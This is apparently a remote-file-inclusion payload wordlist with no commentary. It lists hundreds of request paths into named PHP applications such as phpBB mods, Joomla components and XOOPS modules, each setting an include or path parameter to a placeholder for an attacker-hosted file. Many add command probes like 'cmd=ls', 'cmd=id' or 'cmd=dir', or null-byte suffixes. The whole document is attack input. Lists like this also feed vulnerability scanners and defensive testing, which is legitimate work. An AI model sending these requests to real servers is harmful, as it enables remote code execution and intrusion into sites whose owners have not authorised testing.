-/help/index.php?show=XXpathXX
-/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
-/helperfunction.php?includedir=XXpathXX
-/hioxBannerRotate.php?hm=XXpathXX
-/hioxRandomAd.php?hm=XXpathXX
-/hioxstats.php?hm=XXpathXX
-/hioxupdate.php?hm=XXpathXX
-/home.php?a=XXpathXX
-/home.php?page=XXpathXX
-/home.php?pagina=XXpathXX
-/home/www/images/doc/index2.php?type=XXpathXX
-/home1.php?ln=XXpathXX
-/home2.php?ln=XXpathXX
-/hsList.php?subdir=XXpathXX?&cmd=ls
-/htdocs/gmapfactory/params.php?gszAppPath=XXpathXX
-/html/admin/modules/plugin_admin.php?_settings[pluginpath]=XXpathXX
-/hu/modules/reg-new/modstart.php?mod_dir=XXpathXX?
-/i_head.php?home=XXpathXX
-/i_nav.php?home=XXpathXX
-/iframe.php?file=XXpathXX
-/image.php?url=XXpathXX???
-/impex/ImpExData.php?systempath=XXpathXX
-/import.php?bibtexrootrel=XXpathXX?
-/importinfo.php?bibtexrootrel=XXpathXX?
-/in.php?returnpath=XXpathXX
-/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=XXpathXX
-/inc/config.inc.php?x[1]=XXpathXX
-/inc/design.inc.php?dir[data]=XXpathXX
-/inc/download_center_lite.inc.php?script_root=XXpathXX
-/inc/formmail.inc.php?script_root=XXpathXX
-/inc/gabarits.php?cfg_racine=XXpathXX
-/inc/header.inc.php?ficStyle=XXpathXX
-/inc/ifunctions.php?GLOBALS[phpQRootDir]=XXpathXX
-/inc/inc.php?cfg_racine=XXpathXX?
-/inc/indexhead.php?fileloc=XXpathXX?
-/inc/irayofuncs.php?irayodirhack=XXpathXX?
-/inc/libs/Smarty_Compiler.class.php?plugin_file=XXpathXX?
-/inc/libs/core/core.display_debug_console.php?plugin_file=XXpathXX?
-/inc/libs/core/core.load_plugins.php?plugin_file=XXpathXX?
-/inc/libs/core/core.load_resource_plugin.php?plugin_file=XXpathXX?
-/inc/libs/core/core.process_cached_inserts.php?plugin_file=XXpathXX?
-/inc/libs/core/core.process_compiled_include.php?plugin_file=XXpathXX?
-/inc/libs/core/core.read_cache_file.php?plugin_file=XXpathXX?
-/inc/linkbar.php?cfile=XXpathXX?
-/inc/login.php?pathCGX=XXpathXX
-/inc/logingecon.php?pathCGX=XXpathXX
-/inc/ltdialogo.php?pathCGX=XXpathXX
-/inc/mtdialogo.php?pathCGX=XXpathXX
-/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=XXpathXX?
-/inc/prepend.inc.php?path=XXpathXX?
-/inc/service.alert.inc.php?SPL_CFG[dirroot]=XXpathXX?
-/inc/settings.php?inc_dir=XXpathXX
-/inc/settings.ses.php?SPL_CFG[dirroot]=XXpathXX?
-/inc/shows.inc.php?cutepath=XXpathXX?
-/inc/sige_init.php?SYS_PATH=XXpathXX?
-/inc_group.php?include_path=XXpathXX?
-/inc_manager.php?include_path=XXpathXX?
-/inc_newgroup.php.php?include_path=XXpathXX?
-/inc_smb_conf.php?include_path=XXpathXX?
-/inc_user.php?include_path=XXpathXX?
-/include.php?_APP_RELATIVE_PATH=XXpathXX
-/include.php?gorumDir=XXpathXX
-/include.php?myng_root=XXpathXX
-/include.php?path=psp/user.php&site=XXpathXX
-/include.php?path[docroot]=XXpathXX
-/include.php?sunPath=XXpathXX
-/include/Beautifier/Core.php?BEAUT_PATH=XXpathXX
-/include/HTML_oben.php?include_path=XXpathXX
-/include/HTML_oben.php?include_path=XXpathXX?
-/include/SQuery/gameSpy2.php?libpath=XXpathXX
-/include/bbs.lib.inc.php?site_path=XXpathXX
-/include/class_yapbbcooker.php?cfgIncludeDirectory=XXpathXX
-/include/classes.php?INCLUDE_DIR=XXpathXX?
-/include/client.php?INCLUDE_DIR=XXpathXX?
-/include/cls_headline_prod.php?INCLUDE_PATH=XXpathXX
-/include/cls_listorders.php?INCLUDE_PATH=XXpathXX
-/include/cls_viewpastorders.php?INCLUDE_PATH=XXpathXX
-/include/common.php?XOOPS_ROOT_PATH=XXpathXX
-/include/common_functions.php?baros_path=XXpathXX?
-/include/config.inc.php?racine=XXpathXX
-/include/copyright.php?tsep_config[absPath]=XXpathXX?cmd=ls
-/include/customize.php?l=XXpathXX&text=Hello%20World
-/include/default_header.php?script_path=XXpathXX
-/include/define.php?INC_DIR=XXpathXX?
-/include/disp_form.php3?cfg_include_dir=XXpathXX?
-/include/disp_smileys.php3?cfg_include_dir=XXpathXX?
-/include/dom.php?path=XXpathXX
-/include/dtd.php?path=XXpathXX
-/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=XXpathXX?
-/include/engine/content/elements/menu.php?CONFIG[AdminPath]=XXpathXX
-/include/forms.php?INCLUDE_DIR=XXpathXX?
-/include/global.php?pfad=XXpathXX
-/include/header.php?cs_base_path=XXpathXX?
-/include/html/nettools.popup.php?DIR=XXpathXX
-/include/inc.foot.php?root=XXpathXX
-/include/inc_ext/spaw/dialogs/table.php?spaw_root=XXpathXX
-/include/inc_freigabe.php?include_path=XXpathXX?
-/include/inc_freigabe1.php?include_path=XXpathXX?
-/include/inc_freigabe3.php?include_path=XXpathXX?
-/include/include_stream.inc.php?include_path=XXpathXX
-/include/include_top.php?g_include=XXpathXX
-/include/includes.php?include_path=XXpathXX
-/include/index.php3?cfg_include_dir=XXpathXX?
-/include/init.inc.php?G_PATH=XXpathXX
-/include/issue_edit.php?INCLUDE_DIR=XXpathXX?
-/include/lib/lib_slots.php?main_path=XXpathXX
-/include/lib/lib_stats.php?main_path=XXpathXX?
-/include/lib/lib_users.php?main_path=XXpathXX?
-/include/little_news.php3?cfg_include_dir=XXpathXX?
-/include/livre_include.php?no_connect=lol&chem_absolu=XXpathXX?
-/include/loading.php?path_include=XXpathXX
-/include/mail.inc.php?root=XXpathXX
-/include/menu_builder.php?config[page_dir]=XXpathXX?
-/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=XXpathXX
-/include/monitoring/engine/MakeXML.php?fileOreonConf=XXpathXX?
-/include/parser.php?path=XXpathXX
-/include/pear/IT.php?basepath=XXpathXX?
-/include/pear/ITX.php?basepath=XXpathXX?
-/include/pear/IT_Error.php?basepath=XXpathXX?
-/include/phpxd/phpXD.php?appconf[rootpath]=XXpathXX?&cmd=id
-/include/prodler.class.php?sPath=XXpathXX???
-/include/scripts/export_batch.inc.php?DIR=XXpathXX
-/include/scripts/run_auto_suspend.cron.php?DIR=XXpathXX
-/include/scripts/send_email_cache.php?DIR=XXpathXX
-/include/startup.inc.php?root_path=XXpathXX?
-/include/themes/themefunc.php?myNewsConf[path][sys][index]=XXpathXX?
-/include/timesheet.php?config[include_dir]=XXpathXX
-/include/urights.php?CRM_inc=XXpathXX
-/includes/admin_board2.php?phpbb_root_path=XXpathXX?ls
-/includes/admin_logger.php?phpbb_root_path=XXpathXX?ls
-/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=XXpathXX?
-/includes/ajax_listado.php?urlModulo=XXpathXX
-/includes/archive/archive_topic.php?phpbb_root_path=XXpathXX?
-/includes/bbcb_mg.php?phpbb_root_path=XXpathXX?
-/includes/begin.inc.php?PagePrefix=XXpathXX
-/includes/blogger.php?path_prefix=XXpathXX
-/includes/class/class_tpl.php?cache_file=XXpathXX?
-/includes/class_template.php?quezza_root_path=XXpathXX
-/includes/classes/pctemplate.php?pcConfig[smartyPath]=XXpathXX?cmd
-/includes/common.inc.php?CONFIG[BASE_PATH]=XXpathXX
-/includes/common.php?module_root_path=XXpathXX?
-/includes/common.php?root=XXpathXX?
-/includes/common.php?root_path=XXpathXX?
-/includes/config.inc.php?racineTBS=XXpathXX
-/includes/config/master.inc.php?fm_data[root]=XXpathXX?
-/includes/connection.inc.php?PagePrefix=XXpathXX
-/includes/dbal.php?eqdkp_root_path=XXpathXX
-/includes/events.inc.php?PagePrefix=XXpathXX
-/includes/footer.html.inc.php?tc_config[app_root]=XXpathXX?
-/includes/footer.inc.php?PagePrefix=XXpathXX
-/includes/footer.php?PHPGREETZ_INCLUDE_DIR=XXpathXX
-/includes/functions.inc.php?sitepath=XXpathXX?
-/includes/functions.php?location=XXpathXX
-/includes/functions.php?phpbb_root_path=XXpathXX
-/includes/functions.php?phpbb_root_path=XXpathXX?
-/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
-/includes/functions/html_generate.php?path_prefix=XXpathXX
-/includes/functions/master.inc.php?fm_data[root]=XXpathXX?
-/includes/functions/validations.php?path_prefix=XXpathXX
-/includes/functions_admin.php?phpbb_root_path=XXpathXX?
-/includes/functions_install.php?vwar_root=XXpathXX
-/includes/functions_kb.php?phpbb_root_path=XXpathXX?
-/includes/functions_mod_user.php?phpbb_root_path=XXpathXX?
-/includes/functions_portal.php?phpbb_root_path=XXpathXX?
-/includes/functions_user_viewed_posts.php?phpbb_root_path=XXpathXX?
-/includes/global.php?nbs=XXpathXX?
-/includes/header.inc.php?PagePrefix=XXpathXX
-/includes/header.inc.php?dateiPfad=XXpathXX
-/includes/include_once.php?include_file=XXpathXX
-/includes/init.php?includepath=XXpathXX?
-/includes/iplogger.php?phpbb_root_path=XXpathXX?ls
-/includes/kb_constants.php?module_root_path=XXpathXX
-/includes/lang/language.php?path_to_root=XXpathXX
-/includes/lib-account.inc.php?CONF_CONFIG_PATH=XXpathXX?
-/includes/lib-group.inc.php?CONF_CONFIG_PATH=XXpathXX?
-/includes/lib-log.inc.php?CONF_CONFIG_PATH=XXpathXX?
-/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=XXpathXX?
-/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=XXpathXX?
-/includes/lib-themes.inc.php?CONF_CONFIG_PATH=XXpathXX?
-/includes/logger_engine.php?phpbb_root_path=XXpathXX
-/includes/menuleft.inc.php?PagePrefix=XXpathXX
-/includes/mkb.php?phpbb_root_path=XXpathXX?ls
-/includes/morcegoCMS/adodb/adodb.inc.php?path=XXpathXX
-/includes/morcegoCMS/morcegoCMS.php?fichero=XXpathXX
-/includes/mx_common.php?module_root_path=XXpathXX?
-/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=XXpathXX
-/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=XXpathXX
-/includes/pafiledb_constants.php?module_root_path=XXpathXX
-/includes/pages.inc.php?PagePrefix=XXpathXX
-/includes/phpdig/includes/config.php?relative_script_path=XXpathXX
-/includes/profilcp_constants.php?module_root_path=XXpathXX?
-/includes/settings.inc.php?approot=XXpathXX
-/includes/template.php?myevent_path=XXpathXX
-/includes/themen_portal_mitte.php?phpbb_root_path=XXpathXX
-/includes/tumbnail.php?config[root_ordner]=XXpathXX?
-/includes/usercp_register.php?phpbb_root_path=XXpathXX?
-/includes/usercp_viewprofile.php?phpbb_root_path=XXpathXX?
-/includes/xhtml.php?d_root=XXpathXX?
-/index.php3?Application_Root=XXpathXX
-/index.php?1=lol&PAGES[lol]=XXpathXX
-/index.php?AML_opensite=XXpathXX
-/index.php?AMV_openconfig=1&AMV_serverpath=XXpathXX
-/index.php?CONFIG[MWCHAT_Libs]=XXpathXX?
-/index.php?ConfigDir=XXpathXX
-/index.php?DIR_PLUGINS=XXpathXX
-/index.php?G_JGALL[inc_path]=XXpathXX%00
-/index.php?HomeDir=XXpathXX
-/index.php?Lang=AR&Page=XXpathXX
-/index.php?Madoa=XXpathXX?
-/index.php?RP_PATH=XXpathXX
-/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
-/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
-/index.php?abg_path=XXpathXX?
-/index.php?abs_path=XXpathXX?
-/index.php?adduser=true&lang=XXpathXX
-/index.php?adodb=XXpathXX
-/index.php?ads_file=XXpathXX
-/index.php?arquivo=XXpathXX
-/index.php?back=XXpathXX
-/index.php?base==XXpathXX
-/index.php?basePath=XXpathXX
-/index.php?bibtexrootrel=XXpathXX?
-/index.php?blog_dc_path=XXpathXX
-/index.php?blog_theme=XXpathXX
-/index.php?body=XXpathXX
-/index.php?class_path=XXpathXX?
-/index.php?classified_path=XXpathXX?
-/index.php?cms=XXpathXX?
-/index.php?config["sipssys"]=XXpathXX
-/index.php?config[root_ordner]=XXpathXX?&cmd=id
-/index.php?config[root_ordner]=XXpathXX?cmd=id
-/index.php?config_atkroot=XXpathXX
-/index.php?configuration=XXpathXX
-/index.php?custom_admin_path=XXpathXX?
-/index.php?dateiPfad=XXpathXX?&cmd=ls
-/index.php?de=XXpathXX
-/index.php?dept=XXpathXX
-/index.php?do=XXpathXX
-/index.php?exec=XXpathXX?
-/index.php?ext=XXpathXX
-/index.php?faq_path=XXpathXX?&cmd=id
-/index.php?file_name[]=XXpathXX?
-/index.php?file_path=XXpathXX?
-/index.php?fileloc=XXpathXX
-/index.php?from=XXpathXX
-/index.php?func=XXpathXX?
-/index.php?function=XXpathXX
-/index.php?function=custom&custom=XXpathXX
-/index.php?gOo=XXpathXX
-/index.php?gen=XXpathXX
-/index.php?get=XXpathXX
-/index.php?home_name=XXpathXX
-/index.php?ilang=XXpathXX?
-/index.php?inc_dir=XXpathXX
-/index.php?inc_dir=XXpathXX?
-/index.php?includeDir=XXpathXX
-/index.php?includeFooter=XXpathXX
-/index.php?includesdir=XXpathXX
-/index.php?insPath=XXpathXX
-/index.php?lang=XXpathXX
-/index.php?language=XXpathXX?
-/index.php?language=en&main_page=XXpathXX
-/index.php?lizge=XXpathXX?&cmd=ls
-/index.php?lng=XXpathXX
-/index.php?load=XXpathXX
-/index.php?loadpage=XXpathXX
-/index.php?main_tabid=1&main_content=XXpathXX
-/index.php?may=XXpathXX
-/index.php?middle=XXpathXX
-/index.php?mode=XXpathXX
-/index.php?modpath=XXpathXX
-/index.php?module=PostWrap&page=XXpathXX
-/index.php?mosConfig_absolute_path=XXpathXX
-/index.php?news7["functions"]=XXpathXX
-/index.php?news_include_path=XXpathXX
-/index.php?open=XXpathXX
-/index.php?option=com_custompages&cpage=XXpathXX?
-/index.php?page=XXpathXX
-/index.php?page=XXpathXX%00
-/index.php?page=XXpathXX?
-/index.php?pageXXpathXX
-/index.php?page[path]=XXpathXX?&cmd=ls
-/index.php?pagename=XXpathXX
-/index.php?pager=XXpathXX
-/index.php?pagina=XXpathXX?
-/index.php?path_to_folder=XXpathXX?cmd=id
-/index.php?pg=XXpathXX?
-/index.php?phpbb_root_path=XXpathXX
-/index.php?plugin=XXpathXX
-/index.php?principal=XXpathXX
-/index.php?proMod=XXpathXX
-/index.php?proMod=XXpathXX?cmd
-/index.php?project=XXpathXX
-/index.php?repinc=XXpathXX?
-/index.php?root_prefix=XXpathXX
-/index.php?root_prefix=XXpathXX?
-/index.php?section=XXpathXX
-/index.php?site=XXpathXX
-/index.php?site_path=XXpathXX
-/index.php?styl[top]=XXpathXX??
-/index.php?template=XXpathXX?
-/index.php?templates_dir=XXpathXX?
-/index.php?theme=XXpathXX
-/index.php?themepath=XXpathXX?
-/index.php?themesdir=XXpathXX
-/index.php?this_path=XXpathXX?
-/index.php?txt=XXpathXX
-/index.php?up=XXpathXX
-/index.php?url=XXpathXX
-/index.php?w=XXpathXX
-/index.php?way=XXpathXX??????????????
-/index1.php?=XXpathXX
-/index1.php?inc=XXpathXX
-/index1.php?inhalt=XXpathXX
-/index2.php?=XXpathXX
-/index2.php?content=XXpathXX
-/index2.php?s=XXpathXX
-/index2.php?x=XXpathXX
-/indexinfo.php?bibtexrootrel=XXpathXX?
-/indexk.php?lib_path=XXpathXX?
-/info.php?file=XXpathXX
-/inhalt.php?dateien[news]=XXpathXX?
-/init.php?API_HOME_DIR=XXpathXX
-/init.php?scriptpath=XXpathXX?
-/initialize.php?hmail_config[includepath]=XXpathXX&cmd=dir
-/initiate.php?abs_path=XXpathXX
-/install.php?_NE[AbsPath]=XXpathXX
-/install.php?install_dir=XXpathXX
-/install/config.php?path=XXpathXX
-/install/di.php?pathtoserverdata=XXpathXX
-/install/index.php?content_php=XXpathXX
-/install/install3.php?database=none&cabsolute_path=XXpathXX
-/integration/shortstat/configuration.php?SPL_CFG[dirroot]=XXpathXX?
-/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=XXpathXX?
-/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=XXpathXX?
-/interface/billing/billing_process.php?srcdir=XXpathXX?
-/interface/editors/-custom.php?bField[bf_data]=XXpathXX
-/interface/editors/custom.php?bField[bf_data]=XXpathXX
-/interface/new/new_patient_save.php?srcdir=XXpathXX?
-/intern/admin/?rootdir=XXpathXX
-/intern/admin/other/backup.php?admin=1&rootdir=XXpathXX
-/intern/clan/member_add.php?rootdir=XXpathXX
-/intern/config/forum.php?rootdir=XXpathXX
-/intern/config/key_2.php?rootdir=XXpathXX
-/ip.inc.php?type=1&cgipath=XXpathXX
-/ipeer_site/?page=XXpathXX?
-/joinus.php?vwar_root=XXpathXX
-/joinus.php?vwar_root=XXpathXX?&cmd=ls
-/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=XXpathXX?
-/joomla_path/components/com_articles.php?absolute_path=XXpathXX?
-/js/bbcodepress/bbcode-form.php?BBCODE_path=XXpathXX
-/js/wptable-tinymce.php?ABSPATH=XXpathXX
-/jscript.php?my_ms[root]=XXpathXX?
-/kernel/class/ixpts.class.php?IXP_ROOT_PATH=XXpathXX
-/kernel/loadkernel.php?installPath=XXpathXX
-/kmitaadmin/kmitam/htmlcode.php?file=XXpathXX?
-/ktmlpro/includes/ktedit/toolbar.php?dirDepth=XXpathXX
-/lang/leslangues.php?fichier=XXpathXX
-/lang_english/lang_main_album.php?phpbb_root_path=XXpathXX?a=
-/language/lang_english/lang_activity.php?phpbb_root_path=XXpathXX
-/language/lang_english/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
-/language/lang_german/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
-/language/lang_german/lang_main_album.php?phpbb_root_path=XXpathXX?a=
-/latestposts.php?forumspath=XXpathXX
-/latex.php?bibtexrootrel=XXpathXX?
-/layout/default/params.php?gConf[dir][layouts]=XXpathXX?
-/ldap/authldap.php?includePath=XXpathXX
-/learnPath/include/scormExport.inc.php?includePath=XXpathXX
-/lib.editor.inc.php?sys_path=XXpathXX?
-/lib/Loggix/Module/Calendar.php?pathToIndex=XXpathXX
-/lib/Loggix/Module/Comment.php?pathToIndex=XXpathXX
-/lib/Loggix/Module/Rss.php?pathToIndex=XXpathXX
-/lib/Loggix/Module/Trackback.php?pathToIndex=XXpathXX
-/lib/action/rss.php?lib=XXpathXX?
-/lib/activeutil.php?set[include_path]=XXpathXX?
-/lib/addressbook.php?GLOBALS[basedir]=XXpathXX
-/lib/armygame.php?libpath=XXpathXX
-/lib/authuser.php?root=XXpathXX
-/lib/base.php?BaseCfg[BaseDir]=XXpathXX
-/lib/connect.php?root=XXpathXX
-/lib/connected_users.lib.php3?ChatPath=XXpathXX
-/lib/connected_users.lib.php3?ChatPath=XXpathXX?
-/lib/db/mysql.class.php?root=XXpathXX
-/lib/db/postgres.class.php?root=XXpathXX
-/lib/functions.php?DOC_ROOT=XXpathXX
-/lib/googlesearch/GoogleSearch.php?APP[path][lib]=XXpathXX?
-/lib/header.php?DOC_ROOT=XXpathXX
-/lib/language.php?_LIB_DIR=XXpathXX
-/lib/live_status.lib.php?ROOT=XXpathXX
-/lib/misc.php?root=XXpathXX
-/lib/nl/nl.php?g_strRootDir=XXpathXX
-/lib/obj/collection.class.php?GLOBALS[application][app_root]=XXpathXX
-/lib/obj/content_image.class.php?GLOBALS[application][app_root]=XXpathXX
-/lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
-/lib/pcltrace.lib.php?g_pcltar_lib_dir=XXpathXX
-/lib/rs.php?rootpath=XXpathXX
-/lib/selectlang.php?BBC_LANGUAGE_PATH=XXpathXX
-/lib/smarty/SmartyFU.class.php?system[smarty][dir]=XXpathXX?
-/lib/static/header.php?set_menu=XXpathXX
-/lib/tpl.inc.php?conf[classpath]=XXpathXX
-/libraries/comment/postComment.php?path[cb]=XXpathXX?a=
-/libraries/database.php?path=XXpathXX???
-/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=XXpathXX
-/libraries/pcl/pcltar.php?g_pcltar_lib_dir=XXpathXX
-/library/authorize.php?login_form=XXpathXX?
-/library/translation.inc.php?GLOBALS[srcdir]=XXpathXX?
-/libs/db.php?path_local=XXpathXX
-/libs/ftp.php?path_local=XXpathXX
-/libs/lom.php?ETCDIR=XXpathXX
-/libsecure.php?abs_path=XXpathXX?
-/license.php?CONFIG[MWCHAT_Libs]=XXpathXX?
-/link_main.php?phpbb_root_path=XXpathXX
-/linkadmin.php?page=XXpathXX?
-/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=XXpathXX?
-/list.php?phpbb_root_path=XXpathXX
-/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=XXpathXX
-/lms_path/modules/welcome.php?_LIB_DIR=XXpathXX
-/load_lang.php?_SERWEB[configdir]=XXpathXX
-/load_lang.php?_SERWEB[serwebdir]=XXpathXX
-/load_phplib.php?_PHPLIB[libdir]=XXpathXX
-/loader.php?GLOBALS=XXpathXX
-/local/lib/lcUser.php?LIBDIR=XXpathXX?
-/log.php?bibtexrootrel=XXpathXX?
-/login.php3?cl_headers=XXpathXX
-/login.php?base_dir=XXpathXX
-/login.php?blog_theme=XXpathXX
-/login.php?langfile=XXpathXX
-/login.php?pachtofile=XXpathXX
-/login.php?srcdir=XXpathXX?
-/login.php?value=XXpathXX??
-/lovecms/install/index.php?step=XXpathXX?
-/m2f/m2f_cron.php?m2f_root_path=XXpathXX
-/m2f/m2f_forum.php?m2f_root_path=XXpathXX
-/m2f/m2f_mailinglist.php?m2f_root_path=XXpathXX
-/m2f/m2f_phpbb204.php?m2f_root_path=XXpathXX
-/maguz.php?site=XXpathXX
-/mail/childwindow.inc.php?form=XXpathXX?
-/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=XXpathXX?
-/mail_this_entry/mail_autocheck.php?pm_path=XXpathXX?&cmd=ls
-/main.inc.php?pathtoscript=XXpathXX
-/main.php?config[search_disp]=true&include_dir=XXpathXX
-/main.php?id=XXpathXX
-/main.php?include_path=XXpathXX?
-/main.php?pageURL=XXpathXX
-/main.php?pagina=XXpathXX
-/main/forum/komentar.php?site_path=XXpathXX
-/main/main.php?pi=XXpathXX
-/main/ppcbannerclick.php?INC=XXpathXX?
-/main/ppcclick.php?INC=XXpathXX?
-/main_prepend.php?_SERWEB[functionsdir]=XXpathXX
-/mainpage.php?docroot=XXpathXX?cmd
-/mamboleto.php?mosConfig_absolute_path=XXpathXX
-/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=XXpathXX
-/manage_songs.php?foing_root_path=XXpathXX
-/manager/admin/index.php?MGR=XXpathXX
-/manager/admin/p_ins.php?MGR=XXpathXX
-/manager/admin/u_ins.php?MGR=XXpathXX
-/manager/articles.php?_PX_config[manager_path]=XXpathXX
-/manager/static/view.php?propID=0&INC=XXpathXX
-/master.php?root_path=XXpathXX
-/mcNews/admin/header.php?skinfile=XXpathXX
-/mcf.php?content=XXpathXX
-/mcnews/admin/install.php?l=XXpathXX
-/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=XXpathXX
-/member.php?vwar_root=XXpathXX
-/member/usercp_menu.php?script_folder=XXpathXX
-/members/index.php?INC=XXpathXX?
-/members/registration.php?INC=XXpathXX?
-/members_help.php?hlp=XXpathXX?
-/membres/membreManager.php?include_path=XXpathXX?
-/menu.php3?cl_headers=XXpathXX
-/menu.php?functions_file=XXpathXX
-/mep/frame.php?chem=XXpathXX?
-/microcms/includes/file_manager/special.php?fm_includes_special=XXpathXX
-/middle.php?file=XXpathXX
-/migrateNE2toNE3.php?_NE[AbsPath]=XXpathXX
-/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=XXpathXX?
-/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=XXpathXX?
-/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=XXpathXX?
-/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=XXpathXX?
-/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=XXpathXX?
-/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=XXpathXX?
-/mini-pub.php/front-end/img.php?sFileName=XXpathXX?
-/minimal/wiki.php?page=XXpathXX?
-/misc/function.php3?path=XXpathXX?
-/mitglieder.php?config[root_ordner]=XXpathXX?&cmd=id
-/mkportal/include/user.php?MK_PATH=XXpathXX
-/mkportal/include/user.php?MK_PATH=XXpathXX?
-/mod/authent.php4?rootpath=XXpathXX
-/mod/image/index.php?config[pathMod]=XXpathXX
-/mod/liens/index.php?config[pathMod]=XXpathXX
-/mod/liste/index.php?config[pathMod]=XXpathXX
-/mod/special/index.php?config[pathMod]=XXpathXX
-/mod/texte/index.php?config[pathMod]=XXpathXX
-/mod_membre/inscription.php?chemin=XXpathXX?
-/mod_phpalbum/sommaire_admin.php?chemin=XXpathXX?
-/modernbill/include/html/config.php?DIR=XXpathXX
-/modifyform.html?code=XXpathXX
-/mods/business_functions.php?GALLERY_BASEDIR=XXpathXX
-/mods/config/load.inc.php?moddir=XXpathXX?
-/mods/http/load.inc.php?moddir=XXpathXX?
-/mods/ui_functions.php?GALLERY_BASEDIR=XXpathXX
-/module/forum/forum.php?fd=XXpathXX=';
-/module/forum/main.php?id=1&main_dir=XXpathXX?&
-/modules.php?name=XXpathXX&file=article&sid=2
-/modules/4nAlbum/public/displayCategory.php?basepath=XXpathXX
-/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=XXpathXX
-/modules/Calendar/admin/update.php?calpath=XXpathXX?
-/modules/Calendar/calendar.php?calpath=XXpathXX?
-/modules/Calendar/scheme.php?calpath=XXpathXX?
-/modules/Discipline/CategoryBreakdownTime.php?FocusPath=XXpathXX
-/modules/Discipline/CategoryBreakdownTime.php?staticpath=XXpathXX
-/modules/Discipline/StudentFieldBreakdown.php?staticpath=XXpathXX
-/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
-/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
-/modules/My_eGallery/index.php?basepath=XXpathXX
-/modules/My_eGallery/public/displayCategory.php?basepath=XXpathXX
-/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=XXpathXX?
-/modules/NukeAI/util.php?AIbasedir=XXpathXX
-/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=XXpathXX
-/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
-/modules/abook/foldertree.php?baseDir==XXpathXX?
-/modules/addons/plugin.php?doc_root=XXpathXX
-/modules/admin/include/config.php?doc_root=XXpathXX
-/modules/admin/include/localize.php?doc_root=XXpathXX
-/modules/agendax/addevent.inc.php?agendax_path=XXpathXX&cmd=id
-/modules/bank/includes/design/main.inc.php?bank_data[root]=XXpathXX?
-/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=XXpathXX
-/modules/birstday/birst.php?exbb[home_path]=XXpathXX?
-/modules/birstday/profile_show.php?exbb[home_path]=XXpathXX?
-/modules/birstday/select.php?exbb[home_path]=XXpathXX?
-/modules/blocks/headerfile.php?system[path]=XXpathXX
-/modules/calendar/index.php?inc_dir=XXpathXX
-/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=XXpathXX?
-/modules/calendar/mod_calendar.php?absolute_path=XXpathXX?
-/modules/certinfo/index.php?full_path=XXpathXX
-/modules/character_roster/include.php?mod_root=XXpathXX?
-/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=XXpathXX?
-/modules/coppermine/themes/default/theme.php?THEME_DIR=XXpathXX
-/modules/downloads/lib/LM_Downloads.php?pathToIndex=XXpathXX
-/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
-/modules/emails/index.php?full_path=XXpathXX
-/modules/events/index.php?full_path=XXpathXX
-/modules/fax/index.php?full_path=XXpathXX
-/modules/files/blocks/latest_files.php?system[path]=XXpathXX
-/modules/files/index.php?full_path=XXpathXX
-/modules/files/list.php?full_path=XXpathXX
-/modules/filters/headerfile.php?system[path]=XXpathXX
-/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=XXpathXX?
-/modules/forums/blocks/latest_posts.php?system[path]=XXpathXX
-/modules/global/inc/content.inc.php?sIncPath=XXpathXX?
-/modules/groupadm/index.php?full_path=XXpathXX
-/modules/groups/headerfile.php?system[path]=XXpathXX
-/modules/guestbook/index.php?CONFIG[local_root]=XXpathXX?
-/modules/history/index.php?full_path=XXpathXX
-/modules/home.module.php?repmod=XXpathXX?
-/modules/horoscope/footer.php?xoopsConfig[root_path]=XXpathXX
-/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=XXpathXX
-/modules/info/index.php?full_path=XXpathXX
-/modules/links/blocks/links.php?system[path]=XXpathXX
-/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
-/modules/links/submit_links.php?rootdp=zZz&gsLanguage=XXpathXX
-/modules/log/index.php?full_path=XXpathXX
-/modules/mail/index.php?full_path=XXpathXX
-/modules/menu/headerfile.php?system[path]=XXpathXX
-/modules/messages/index.php?full_path=XXpathXX
-/modules/mod_as_category.php?mosConfig_absolute_path=XXpathXX
